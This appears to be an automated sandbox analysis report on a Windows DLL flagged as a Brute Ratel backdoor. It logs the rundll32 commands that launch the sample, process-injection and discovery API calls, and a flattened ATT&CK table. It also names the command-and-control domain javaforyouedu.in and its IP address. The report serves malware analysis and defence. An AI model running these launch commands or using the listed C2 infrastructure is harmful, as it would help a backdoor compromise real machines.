    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFE133025E0 NtAllocateVirtualMemory,NtProtectVirtualMemory,NtCreateThreadEx,VirtualFreeEx,3_2_00007FFE133025E0
    Source: C:\Windows\System32\rundll32.exeCode function: 3_3_000001CDED27BA3A3_3_000001CDED27BA3A
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFE133025E03_2_00007FFE133025E0
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87661505_2_000001E8C8766150
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87641205_2_000001E8C8764120
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C8761D005_2_000001E8C8761D00
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87644F05_2_000001E8C87644F0
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C874C9C05_2_000001E8C874C9C0
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C876E1B05_2_000001E8C876E1B0
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87701B05_2_000001E8C87701B0
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87595805_2_000001E8C8759580
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C8745EC05_2_000001E8C8745EC0
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C875A2A05_2_000001E8C875A2A0
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C876F6905_2_000001E8C876F690
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C8752B605_2_000001E8C8752B60
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87577505_2_000001E8C8757750
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87567305_2_000001E8C8756730
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87533A05_2_000001E8C87533A0
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C875EBA05_2_000001E8C875EBA0
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C8758B905_2_000001E8C8758B90
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87603805_2_000001E8C8760380
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C874AF705_2_000001E8C874AF70
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C874A0205_2_000001E8C874A020
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87520105_2_000001E8C8752010
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87630105_2_000001E8C8763010
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87650E05_2_000001E8C87650E0
    Source: IMS64.dll.dllStatic PE information: Number of sections : 11 > 10
    Source: classification engineClassification label: mal76.troj.evad.winDLL@10/0@1/1
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C875CAD0 CreateToolhelp32Snapshot,Thread32First,5_2_000001E8C875CAD0
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
    Source: C:\Windows\System32\rundll32.exeMutant created: NULL
    Source: IMS64.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\IMS64.dll.dll,main
    Source: IMS64.dll.dllReversingLabs: Detection: 28%
    Source: IMS64.dll.dllVirustotal: Detection: 26%
    Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\IMS64.dll.dll"
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\IMS64.dll.dll,main
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",main
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\IMS64.dll.dll,mainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",mainJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: IMS64.dll.dllStatic PE information: Image base 0x205d50000 > 0x60000000
    Source: IMS64.dll.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: IMS64.dll.dllStatic PE information: section name: .xdata
    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001FB0D91C282 pushad ; ret 4_2_000001FB0D91C2F1
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,5_2_000001E8C87624C0
    Source: C:\Windows\System32\rundll32.exeAPI coverage: 0.0 %
    Source: C:\Windows\System32\loaddll64.exe TID: 7312Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
    Source: rundll32.exe, 00000003.00000002.4122414649.000001CDED148000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4122414649.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3711576277.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024250096.000001FB0D935000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D8D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6BEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C874D5C0 LdrGetProcedureAddress,5_2_000001E8C874D5C0
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C874A8B0 RtlAddVectoredExceptionHandler,5_2_000001E8C874A8B0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 43.206.237.192 443Jump to behavior
    Source: C:\Windows\System32\rundll32.exeThread register set: target process: 7396Jump to behavior
    Source: C:\Windows\System32\rundll32.exeThread register set: target process: 7396Jump to behavior
    Source: C:\Windows\System32\rundll32.exeThread register set: target process: 7372Jump to behavior
    Source: C:\Windows\System32\rundll32.exeThread register set: target process: 7372Jump to behavior
    Source: C:\Windows\System32\rundll32.exeThread register set: target process: 7396Jump to behavior
    Source: C:\Windows\System32\rundll32.exeThread register set: target process: 7396Jump to behavior
    Source: C:\Windows\System32\rundll32.exeThread register set: 7396 1Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1Jump to behavior
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E8C87624C0 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,5_2_000001E8C87624C0

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7500, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7500, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading
    311
    Process Injection
    11
    Virtualization/Sandbox Evasion
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    311
    Process Injection
    LSASS Memory11
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Obfuscated Files or Information
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive13
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Rundll32
    NTDS1
    Account Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    System Owner/User Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
    System Network Configuration Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    IMS64.dll.dll29%ReversingLabsWin64.Backdoor.Brutel
    IMS64.dll.dll27%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://javaforyouedu.in/rofl/adminy0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admin=0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admin8x0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admin90%Avira URL Cloudsafe
    https://javaforyouedu.in/0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admino0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admin40%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admins0%Avira URL Cloudsafe
    https://javaforyouedu.in/0%VirustotalBrowse
    https://javaforyouedu.in/rofl/admin20%Avira URL Cloudsafe
    https://javaforyouedu.in/wA0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/adminM0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/adminL0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/adminxcn(0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/adminA0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admin~0%Avira URL Cloudsafe
    https://javaforyouedu.in/O0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/adminD0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/adminYcM(0%Avira URL Cloudsafe
    https://javaforyouedu.in/H0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/adminN0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admini0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admin0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/adminA0%VirustotalBrowse
    https://javaforyouedu.in/rofl/admink0%Avira URL Cloudsafe
    https://javaforyouedu.in/-0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admin#0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/adminux0%Avira URL Cloudsafe
    https://javaforyouedu.in/rofl/admin0%VirustotalBrowse
    https://javaforyouedu.in/rofl/admin#0%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    javaforyouedu.in
    43.206.237.192
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://javaforyouedu.in/rofl/admintrue
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://javaforyouedu.in/rofl/admin8xrundll32.exe, 00000003.00000002.4122414649.000001CDED1DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/admin9rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminyrundll32.exe, 00000005.00000003.3597962223.000001E8C6C8B000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rundll32.exe, 00000003.00000002.4122414649.000001CDED202000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4122414649.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED207000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3711576277.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640820421.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024250096.000001FB0D935000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336710000.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/admin=rundll32.exe, 00000004.00000003.3711576277.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D918000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminorundll32.exe, 00000004.00000003.3711716551.000001FB0D9B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640820421.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640866940.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024200405.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2853714968.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336772158.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336710000.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2853768398.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/admin4rundll32.exe, 00000003.00000003.3145988406.000001CDED22A000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminsrundll32.exe, 00000005.00000002.4122196214.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/admin2rundll32.exe, 00000005.00000003.2318339849.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/wArundll32.exe, 00000004.00000002.4122385364.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3711576277.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024250096.000001FB0D935000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminMrundll32.exe, 00000005.00000003.3122503909.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2318339849.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2484020877.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958211641.000001E8C6CD5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851202401.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385381204.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958118482.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminLrundll32.exe, 00000004.00000003.3711576277.000001FB0D994000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminxcn(rundll32.exe, 00000004.00000003.3711576277.000001FB0D966000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminArundll32.exe, 00000004.00000002.4122385364.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/admin~rundll32.exe, 00000004.00000003.1716599072.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1717104370.000001FB0D991000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/Orundll32.exe, 00000005.00000003.2318339849.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminDrundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminYcM(rundll32.exe, 00000004.00000003.3711576277.000001FB0D966000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/Hrundll32.exe, 00000004.00000003.1716599072.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1717104370.000001FB0D991000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminNrundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminirundll32.exe, 00000005.00000003.2483934674.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958118482.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3122503909.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2318339849.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminkrundll32.exe, 00000004.00000003.3711576277.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D918000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/-rundll32.exe, 00000003.00000003.2024553634.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4122414649.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED19F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/admin#rundll32.exe, 00000005.00000003.2483934674.000001E8C6C8B000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://javaforyouedu.in/rofl/adminuxrundll32.exe, 00000003.00000002.4122414649.000001CDED1DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      43.206.237.192
      javaforyouedu.inJapan4249LILLY-ASUStrue
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1500442
      Start date and time:2024-08-28 13:37:04 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 6m 36s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:11
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:IMS64.dll.dll
      (renamed file extension from exe to dll)
      Original Sample Name:IMS64.dll.exe
      Detection:MAL
      Classification:mal76.troj.evad.winDLL@10/0@1/1
      EGA Information:
      • Successful, ratio: 66.7%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 10
      • Number of non-executed functions: 3
      Cookbook Comments:
      • Override analysis time to 240s for rundll32
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target rundll32.exe, PID 7396 because there are no executed function
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      07:37:57API Interceptor1x Sleep call for process: loaddll64.exe modified
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      LILLY-ASUSSecuriteInfo.com.Riskware.2144FlashPlayer.13074.5713.exeGet hashmaliciousUnknownBrowse
      • 43.175.151.206
      DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
